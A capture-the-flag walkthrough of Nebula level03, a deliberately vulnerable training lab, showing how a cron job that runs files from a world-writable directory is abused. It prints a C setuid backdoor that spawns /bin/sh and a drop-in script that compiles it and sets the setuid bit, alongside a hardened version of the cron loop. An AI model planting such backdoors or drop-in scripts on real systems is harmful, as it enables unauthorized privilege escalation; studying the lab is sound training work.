Exploit-Exercises: Nebula
Level03 - This crontab will kill you
In this level we take advantage of weak file permissions and a crontab job to get a shell and capture the flag!
Let’s go!
Here is what Exploit-Exercises tells us about the level:
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
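Here is the script executed by the crontab:
#!/bin/bash
# Run every file found in the drop-in directory, then delete it.
for i in /home/flag03/writable.d/* ; do
    # Limit each script to 5 seconds of CPU time; -x traces the commands it runs.
    (ulimit -t 5; bash -x "$i")
    rm -f "$i"
done
The script simply executes every file in /home/flag03/writable.d. This directory has 777 permissions, so any user can read, write and execute in it.
Because the cron job runs as flag03, anything we drop into that directory is executed as flag03, and that is how we will get a shell as that user.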
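The root cause is a privileged job that trusts a directory anyone can write to. As an added example (not the level's own script), here is a hardened version of that loop that only runs files which nobody except a trusted owner could have planted or modified; it assumes GNU stat, and the function names are hypothetical.

```bash
#!/bin/bash
# Added example: hardened drop-in runner (not the level's script).
# Assumes GNU stat (stat -c). Function names are hypothetical.

# Return 0 if PATH has no group or other write bit set.
owner_only_writable() {
    local mode
    mode=$(stat -c '%A' -- "$1") || return 1
    case "$mode" in
        ?????w*|????????w*) return 1 ;;   # e.g. drwxrwxrwx or -rw-rw-r--
    esac
    return 0
}

# Return 0 only if FILE is a regular file (not a symlink) and both FILE and
# its directory are owned by TRUSTED_UID or root and writable by the owner only.
safe_to_run() {
    local file=$1 trusted_uid=$2 p owner
    [ -f "$file" ] && [ ! -L "$file" ] || return 1
    for p in "$(dirname -- "$file")" "$file"; do
        owner=$(stat -c '%u' -- "$p") || return 1
        [ "$owner" -eq "$trusted_uid" ] || [ "$owner" -eq 0 ] || return 1
        owner_only_writable "$p" || return 1
    done
    return 0
}

# Replacement for the cron loop: run vetted files, log and skip the rest.
run_dropins() {
    local dir=$1 trusted_uid=$2 f
    for f in "$dir"/*; do
        [ -e "$f" ] || continue
        if safe_to_run "$f" "$trusted_uid"; then
            (ulimit -t 5; bash "$f")
        else
            echo "skipping $f: untrusted owner or writable by others" >&2
        fi
    done
}
```

With the directory left at 777, every file in it is skipped, which makes the misconfiguration visible in the job's stderr instead of silently exploitable.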
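First, let’s make a simple setuid backdoor in C:
vim /tmp/shell.c
#define _GNU_SOURCE   /* needed for the setresgid()/setresuid() prototypes */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;
    /* Effective IDs are those of the binary's owner when it is setuid/setgid. */
    gid = getegid();
    uid = geteuid();
    /* Copy them into the real and saved IDs so the shell keeps them. */
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);
    system("/bin/sh");
    return 0;
}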
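Once compiled and made setuid by flag03, this C program will run as flag03. Now, in /home/flag03/writable.d/, create a script that compiles the shell and sets its permissions:
#!/bin/bash
# Compiled by the cron job, so the binary is owned by flag03.
gcc /tmp/shell.c -o shell
# Set the setuid and setgid bits on the binary.
chmod +s shell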
Then run:
watch ls -lR /home/flag03/
This runs ls every 2 seconds on the flag03 directory, so you will see your shell appear.
The -l argument shows permissions, and -R lists directories recursively.
The shell binary is in the /home/flag03 directory and is setuid; run it to pwn the level!
Congratulations!
See you for the next level!